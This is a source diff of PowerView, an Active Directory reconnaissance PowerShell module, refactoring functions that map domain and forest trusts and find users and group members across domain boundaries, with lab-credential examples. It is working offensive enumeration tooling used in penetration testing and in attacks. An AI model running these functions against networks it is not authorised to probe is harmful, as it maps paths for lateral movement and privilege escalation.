+                        $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType
+                        $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes
+                        $DomainTrust | Add-Member Noteproperty 'TargetSid' $SidString
+                        $DomainTrust | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid
+                        $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API')
+                        $DomainTrust
                     }
-                    # free up the result buffer
-                    $Null = $Netapi32::NetApiBufferFree($PtrInfo)
-                }
-                else {
-                    Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
                 }
+                # free up the result buffer
+                $Null = $Netapi32::NetApiBufferFree($PtrInfo)
             }
             else {
-                Write-Verbose "Could not retrieve domain controller for $Domain"
+                Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
             }
         }
         else {
-            # if we're using direct domain connections through .NET
-            $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential
-            if($FoundDomain) {
+            # if we're searching for domain trusts through .NET methods
+            $FoundDomain = Get-Domain @NetSearcherArguments
+            if ($FoundDomain) {
                 $FoundDomain.GetAllTrustRelationships() | ForEach-Object {
-                    $_.PSObject.TypeNames.Add('PowerView.DomainTrust')
+                    $_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET')
                     $_
                 }
             }
@@ -12754,50 +17679,83 @@ function Get-NetDomainTrust {
 }
 
 
-function Get-NetForestTrust {
+function Get-ForestTrust {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Return all forest trusts for the current forest or a specified forest.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Forest  
+
+.DESCRIPTION
+
+This function will enumerate domain trust relationships for the current (or a remote)
+forest using number of method using the .NET method GetAllTrustRelationships() on a
+System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
+
+.PARAMETER Forest
+
+Specifies the forest to query for trusts, defaults to the current forest.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
 
-        Return all trusts for the current forest.
+Get-ForestTrust
 
-    .PARAMETER Forest
+Return current forest trusts.
 
-        Return trusts for the specified forest.
+.EXAMPLE
 
-    .PARAMETER Credential
+Get-ForestTrust -Forest "external.local"
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Return trusts for the "external.local" forest.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetForestTrust
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestTrust -Forest "external.local" -Credential $Cred
 
-        Return current forest trusts.
+Return trusts for the "external.local" forest using the specified alternate credenitals.
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-NetForestTrust -Forest "test"
+PowerView.DomainTrust.NET
 
-        Return trusts for the "test" forest.
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.ForestTrust.NET')]
     [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [ValidateNotNullOrEmpty()]
         [String]
         $Forest,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    process {
-        $FoundForest = Get-NetForest -Forest $Forest -Credential $Credential
+    PROCESS {
+        $NetForestArguments = @{}
+        if ($PSBoundParameters['Forest']) { $NetForestArguments['Forest'] = $Forest }
+        if ($PSBoundParameters['Credential']) { $NetForestArguments['Credential'] = $Credential }
+
+        $FoundForest = Get-Forest @NetForestArguments
 
-        if($FoundForest) {
+        if ($FoundForest) {
             $FoundForest.GetAllTrustRelationships() | ForEach-Object {
-                $_.PSObject.TypeNames.Add('PowerView.ForestTrust')
+                $_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET')
                 $_
             }
         }
@@ -12805,391 +17763,593 @@ function Get-NetForestTrust {
 }
 
 
-function Find-ForeignUser {
+function Get-DomainForeignUser {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Enumerates users who are in groups outside of the user's domain.
+This is a domain's "outgoing" access.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Domain, Get-DomainUser  
+
+.DESCRIPTION
+
+Uses Get-DomainUser to enumerate all users for the current (or target) domain,
+then calculates the given user's domain name based on the user's distinguishedName.
+This domain name is compared to the queried domain, and the user object is
+output if they differ.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        Enumerates users who are in groups outside of their
-        principal domain. The -Recurse option will try to map all 
-        transitive domain trust relationships and enumerate all 
-        users who are in groups outside of their principal domain.
+.PARAMETER ResultPageSize
 
-    .PARAMETER UserName
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Username to filter results for, wildcards accepted.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER Domain
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Domain to query for users, defaults to the current domain.
+.PARAMETER SecurityMasks
 
-    .PARAMETER DomainController
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Tombstone
 
-    .PARAMETER LDAP
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
-        More likely to get around network segmentation, but not as accurate.
+.PARAMETER Credential
 
-    .PARAMETER Recurse
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        Switch. Enumerate all user trust groups from all reachable domains recursively.
+.EXAMPLE
 
-    .PARAMETER PageSize
+Get-DomainForeignUser
 
-        The PageSize to set for the LDAP searcher object.
+Return all users in the current domain who are in groups not in the
+current domain.
 
-    .LINK
+.EXAMPLE
 
-        http://blog.harmj0y.net/
+Get-DomainForeignUser -Domain dev.testlab.local
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and
+using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.ForeignUser
+
+Custom PSObject with translated user property fields.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.ForeignUser')]
     [CmdletBinding()]
-    param(
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [ValidateNotNullOrEmpty()]
         [String]
-        $UserName,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $Domain,
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $DomainController,
+        $SearchBase,
 
-        [Switch]
-        $LDAP,
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
-        [Switch]
-        $Recurse,
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200
-    )
+        $ResultPageSize = 200,
 
-    function Get-ForeignUser {
-        # helper used to enumerate users who are in groups outside of their principal domain
-        param(
-            [String]
-            $UserName,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-            [String]
-            $Domain,
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
 
-            [String]
-            $DomainController,
+        [Switch]
+        $Tombstone,
 
-            [ValidateRange(1,10000)] 
-            [Int]
-            $PageSize = 200
-        )
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-        if ($Domain) {
-            # get the domain name into distinguished form
-            $DistinguishedDomainName = "DC=" + $Domain -replace '\.',',DC='
+    BEGIN {
+        $SearcherArguments = @{}
+        $SearcherArguments['LDAPFilter'] = '(memberof=*)'
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }
+    }
+
+    PROCESS {
+        if ($PSBoundParameters['Domain']) {
+            $SearcherArguments['Domain'] = $Domain
+            $TargetDomain = $Domain
+        }
+        elseif ($PSBoundParameters['Credential']) {
+            $TargetDomain = Get-Domain -Credential $Credential | Select-Object -ExpandProperty name
+        }
+        elseif ($Env:USERDNSDOMAIN) {
+            $TargetDomain = $Env:USERDNSDOMAIN
         }
         else {
-            $DistinguishedDomainName = [String] ([adsi]'').distinguishedname
-            $Domain = $DistinguishedDomainName -replace 'DC=','' -replace ',','.'
+            throw "[Get-DomainForeignUser] No domain found to enumerate!"
         }
 
-        Get-NetUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize -Filter '(memberof=*)' | ForEach-Object {
+        Get-DomainUser @SearcherArguments  | ForEach-Object {
             ForEach ($Membership in $_.memberof) {
-                $Index = $Membership.IndexOf("DC=")
-                if($Index) {
-                    
-                    $GroupDomain = $($Membership.substring($Index)) -replace 'DC=','' -replace ',','.'
-                    
-                    if ($GroupDomain.CompareTo($Domain)) {
-                        # if the group domain doesn't match the user domain, output
-                        $GroupName = $Membership.split(",")[0].split("=")[1]
+                $Index = $Membership.IndexOf('DC=')
+                if ($Index) {
+
+                    $GroupDomain = $($Membership.SubString($Index)) -replace 'DC=','' -replace ',','.'
+
+                    if ($GroupDomain -ne $TargetDomain) {
+                        # if the group domain doesn't match the user domain, display it
+                        $GroupName = $Membership.Split(',')[0].split('=')[1]
                         $ForeignUser = New-Object PSObject
-                        $ForeignUser | Add-Member Noteproperty 'UserDomain' $Domain
+                        $ForeignUser | Add-Member Noteproperty 'UserDomain' $TargetDomain
                         $ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname
+                        $ForeignUser | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname
                         $ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain
                         $ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName
-                        $ForeignUser | Add-Member Noteproperty 'GroupDN' $Membership
+                        $ForeignUser | Add-Member Noteproperty 'GroupDistinguishedName' $Membership
+                        $ForeignUser.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser')
                         $ForeignUser
                     }
                 }
             }
         }
     }
-
-    if ($Recurse) {
-        # get all rechable domains in the trust mesh and uniquify them
-        if($LDAP -or $DomainController) {
-            $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
-        }
-        else {
-            $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
-        }
-
-        ForEach($DomainTrust in $DomainTrusts) {
-            # get the trust groups for each domain in the trust mesh
-            Write-Verbose "Enumerating trust groups in domain $DomainTrust"
-            Get-ForeignUser -Domain $DomainTrust -UserName $UserName -PageSize $PageSize
-        }
-    }
-    else {
-        Get-ForeignUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize
-    }
 }
 
 
-function Find-ForeignGroup {
+function Get-DomainForeignGroupMember {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Enumerates all the members of a given domain's groups
-        and finds users that are not in the queried domain.
-        The -Recurse flag will perform this enumeration for all
-        eachable domain trusts.
+Enumerates groups with users outside of the group's domain and returns
+each foreign member. This is a domain's "incoming" access.
 
-    .PARAMETER GroupName
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Domain, Get-DomainGroup  
 
-        Groupname to filter results for, wildcards accepted.
+.DESCRIPTION
 
-    .PARAMETER Domain
+Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
+then enumerates the members of each group, and compares the member's domain
+name to the parent group's domain name, outputting the member if the domains differ.
 
-        Domain to query for groups, defaults to the current domain.
+.PARAMETER Domain
 
-    .PARAMETER DomainController
+Specifies the domain to use for the query, defaults to the current domain.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER LDAPFilter
 
-    .PARAMETER LDAP
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
-        More likely to get around network segmentation, but not as accurate.
+.PARAMETER Properties
 
-    .PARAMETER Recurse
+Specifies the properties of the output object to retrieve from the server.
 
-        Switch. Enumerate all group trust users from all reachable domains recursively.
+.PARAMETER SearchBase
 
-    .PARAMETER PageSize
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Server
 
-    .LINK
+Specifies an Active Directory server (domain controller) to bind to.
 
-        http://blog.harmj0y.net/
-#>
+.PARAMETER SearchScope
 
-    [CmdletBinding()]
-    param(
-        [String]
-        $GroupName = '*',
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        [String]
-        $Domain,
+.PARAMETER ResultPageSize
 
-        [String]
-        $DomainController,
+Specifies the PageSize to set for the LDAP searcher object.
 
-        [Switch]
-        $LDAP,
+.PARAMETER ServerTimeLimit
 
-        [Switch]
-        $Recurse,
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        [ValidateRange(1,10000)] 
-        [Int]
-        $PageSize = 200
-    )
+.PARAMETER SecurityMasks
 
-    function Get-ForeignGroup {
-        param(
-            [String]
-            $GroupName = '*',
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-            [String]
-            $Domain,
+.PARAMETER Tombstone
 
-            [String]
-            $DomainController,
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-            [ValidateRange(1,10000)] 
-            [Int]
-            $PageSize = 200
-        )
+.PARAMETER Credential
 
-        if(-not $Domain) {
-            $Domain = (Get-NetDomain).Name
-        }
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        $DomainDN = "DC=$($Domain.Replace('.', ',DC='))"
-        Write-Verbose "DomainDN: $DomainDN"
+.EXAMPLE
 
-        # standard group names to ignore
-        $ExcludeGroups = @("Users", "Domain Users", "Guests")
+Get-DomainForeignGroupMember
 
-        # get all the groupnames for the given domain
-        Get-NetGroup -GroupName $GroupName -Filter '(member=*)' -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Where-Object {
-            # exclude common large groups
-            -not ($ExcludeGroups -contains $_.samaccountname) } | ForEach-Object {
-                
-                $GroupName = $_.samAccountName
+Return all group members in the current domain where the group and member differ.
 
-                $_.member | ForEach-Object {
-                    # filter for foreign SIDs in the cn field for users in another domain,
-                    #   or if the DN doesn't end with the proper DN for the queried domain  
-                    if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.substring($_.IndexOf("DC="))))) {
+.EXAMPLE
 
-                        $UserDomain = $_.subString($_.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
-                        $UserName = $_.split(",")[0].split("=")[1]
+Get-DomainForeignGroupMember -Domain dev.testlab.local
 
-                        $ForeignGroupUser = New-Object PSObject
-                        $ForeignGroupUser | Add-Member Noteproperty 'GroupDomain' $Domain
-                        $ForeignGroupUser | Add-Member Noteproperty 'GroupName' $GroupName
-                        $ForeignGroupUser | Add-Member Noteproperty 'UserDomain' $UserDomain
-                        $ForeignGroupUser | Add-Member Noteproperty 'UserName' $UserName
-                        $ForeignGroupUser | Add-Member Noteproperty 'UserDN' $_
-                        $ForeignGroupUser
-                    }
-                }
-        }
+Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all group members in the dev.testlab.local domain where the member is
+not in dev.testlab.local. binding to the secondary.dev.testlab.local for
+queries, and using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.ForeignGroupMember
+
+Custom PSObject with translated group member property fields.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.ForeignGroupMember')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name')]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
+
+        [Switch]
+        $Tombstone,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+        $SearcherArguments = @{}
+        $SearcherArguments['LDAPFilter'] = '(member=*)'
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }
     }
 
-    if ($Recurse) {
-        # get all rechable domains in the trust mesh and uniquify them
-        if($LDAP -or $DomainController) {
-            $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
+    PROCESS {
+        if ($PSBoundParameters['Domain']) {
+            $SearcherArguments['Domain'] = $Domain
+            $TargetDomain = $Domain
+        }
+        elseif ($PSBoundParameters['Credential']) {
+            $TargetDomain = Get-Domain -Credential $Credential | Select-Object -ExpandProperty name
+        }
+        elseif ($Env:USERDNSDOMAIN) {
+            $TargetDomain = $Env:USERDNSDOMAIN
         }
         else {
-            $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
+            throw "[Get-DomainForeignGroupMember] No domain found to enumerate!"
         }
 
-        ForEach($DomainTrust in $DomainTrusts) {
-            # get the trust groups for each domain in the trust mesh
-            Write-Verbose "Enumerating trust groups in domain $DomainTrust"
-            Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize
+        # standard group names to ignore
+        $ExcludeGroups = @('Users', 'Domain Users', 'Guests')
+        $DomainDN = "DC=$($TargetDomain.Replace('.', ',DC='))"
+
+        Get-DomainGroup @SearcherArguments | Where-Object {$ExcludeGroups -notcontains $_.samaccountname} | ForEach-Object {
+            $GroupName = $_.samAccountName
+            $GroupDistinguishedName = $_.distinguishedname
+
+            $_.member | ForEach-Object {
+                # filter for foreign SIDs in the cn field for users in another domain,
+                #   or if the DN doesn't end with the proper DN for the queried domain
+                if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.SubString($_.IndexOf('DC='))))) {
+
+                    $MemberDistinguishedName = $_
+                    $MemberDomain = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                    $MemberName = $_.Split(',')[0].split('=')[1]
+
+                    $ForeignGroupMember = New-Object PSObject
+                    $ForeignGroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain
+                    $ForeignGroupMember | Add-Member Noteproperty 'GroupName' $GroupName
+                    $ForeignGroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupDistinguishedName
+                    $ForeignGroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain
+                    $ForeignGroupMember | Add-Member Noteproperty 'MemberName' $MemberName
+                    $ForeignGroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDistinguishedName
+                    $ForeignGroupMember.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember')
+                    $ForeignGroupMember
+                }
+            }
         }
     }
-    else {
-        Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize
-    }
 }
 
 
-function Find-ManagedSecurityGroups {
+function Get-DomainTrustMapping {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        This function retrieves all security groups in the domain and identifies ones that
-        have a manager set. It also determines whether the manager has the ability to add
-        or remove members from the group.
+This function enumerates all trusts for the current domain and then enumerates
+all trusts for each domain it finds.
 
-        Author: Stuart Morgan (@ukstufus) <stuart.morgan@mwrinfosecurity.com>
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Domain, Get-DomainTrust, Get-ForestTrust  
 
-    .EXAMPLE
+.DESCRIPTION
 
-        PS C:\> Find-ManagedSecurityGroups | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+This function will enumerate domain trust relationships for the current domain using
+a number of methods, and then enumerates all trusts for each found domain, recursively
+mapping all reachable trust relationships. By default, the .NET method GetAllTrustRelationships()
+is used on the System.DirectoryServices.ActiveDirectory.Domain object. If the -LDAP flag
+is specified, or any of the LDAP-appropriate parameters, an LDAP search using the filter
+'(objectClass=trustedDomain)' is used instead. If the -API flag is specified, the
+Win32 API DsEnumerateDomainTrusts() call is used to enumerate instead.
 
-        Store a list of all security groups with managers in group-managers.csv
+.PARAMETER API
 
-    .DESCRIPTION
+Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in
+.NET methods.
 
-        Authority to manipulate the group membership of AD security groups and distribution groups 
-        can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically
-        used to delegate management authority to distribution groups, but Windows supports security groups
-        being managed in the same way.
+.PARAMETER LDAP
 
-        This function searches for AD groups which have a group manager set, and determines whether that
-        user can manipulate group membership. This could be a useful method of horizontal privilege
-        escalation, especially if the manager can manipulate the membership of a privileged group.
+Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
 
-    .LINK
+.PARAMETER LDAPFilter
 
-        https://github.com/PowerShellEmpire/Empire/pull/119
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-#>
+.PARAMETER Properties
 
-    # Go through the list of security groups on the domain and identify those who have a manager
-    Get-NetGroup -FullData -Filter '(managedBy=*)' | Select-Object -Unique distinguishedName,managedBy,cn | ForEach-Object {
+Specifies the properties of the output object to retrieve from the server.
 
-        # Retrieve the object that the managedBy DN refers to
-        $group_manager = Get-ADObject -ADSPath $_.managedBy | Select-Object cn,distinguishedname,name,samaccounttype,samaccountname
+.PARAMETER SearchBase
 
-        # Create a results object to store our findings
-        $results_object = New-Object -TypeName PSObject -Property @{
-            'GroupCN' = $_.cn
-            'GroupDN' = $_.distinguishedname
-            'ManagerCN' = $group_manager.cn
-            'ManagerDN' = $group_manager.distinguishedName
-            'ManagerSAN' = $group_manager.samaccountname
-            'ManagerType' = ''
-            'CanManagerWrite' = $FALSE
-        }
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        # Determine whether the manager is a user or a group
-        if ($group_manager.samaccounttype -eq 0x10000000) {
-            $results_object.ManagerType = 'Group'
-        } elseif ($group_manager.samaccounttype -eq 0x30000000) {
-            $results_object.ManagerType = 'User'
-        }
+.PARAMETER Server
 
-        # Find the ACLs that relate to the ability to write to the group
-        $xacl = Get-ObjectAcl -ADSPath $_.distinguishedname -Rights WriteMembers
+Specifies an Active Directory server (domain controller) to bind to.
 
-        # Double-check that the manager
-        if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AccessControlType -eq 'Allow' -and $xacl.IdentityReference.Value.Contains($group_manager.samaccountname)) {
-            $results_object.CanManagerWrite = $TRUE
-        }
-        $results_object
-    }
-}
+.PARAMETER SearchScope
 
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-function Invoke-MapDomainTrust {
-<#
-    .SYNOPSIS
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
 
-        This function gets all trusts for the current domain,
-        and tries to get all trusts for each domain it finds.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER LDAP
+.EXAMPLE
 
-        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
-        More likely to get around network segmentation, but not as accurate.
+Get-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv
 
-    .PARAMETER DomainController
+Map all reachable domain trusts using .NET methods and output everything to a .csv file.
 
-        Domain controller to reflect LDAP queries through.
+.EXAMPLE
 
-    .PARAMETER PageSize
+Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv
 
-        The PageSize to set for the LDAP searcher object.
+Map all reachable domain trusts using Win32 API calls and output everything to a .csv file.
 
-    .PARAMETER Credential
+.EXAMPLE
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Get-DomainTrustMapping -LDAP -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv
 
-    .EXAMPLE
+Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries,
+and output everything to a .csv file.
 
-        PS C:\> Invoke-MapDomainTrust | Export-CSV -NoTypeInformation trusts.csv
-        
-        Map all reachable domain trusts and output everything to a .csv file.
+.EXAMPLE
 
-    .LINK
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainTrustMapping -LDAP -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv
 
-        http://blog.harmj0y.net/
+Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries
+using the specified alternate credentials, and output everything to a .csv file.
+
+.OUTPUTS
+
+PowerView.DomainTrust.NET
+
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
+
+PowerView.DomainTrust.LDAP
+
+Custom PSObject with translated domain LDAP trust result fields.
+
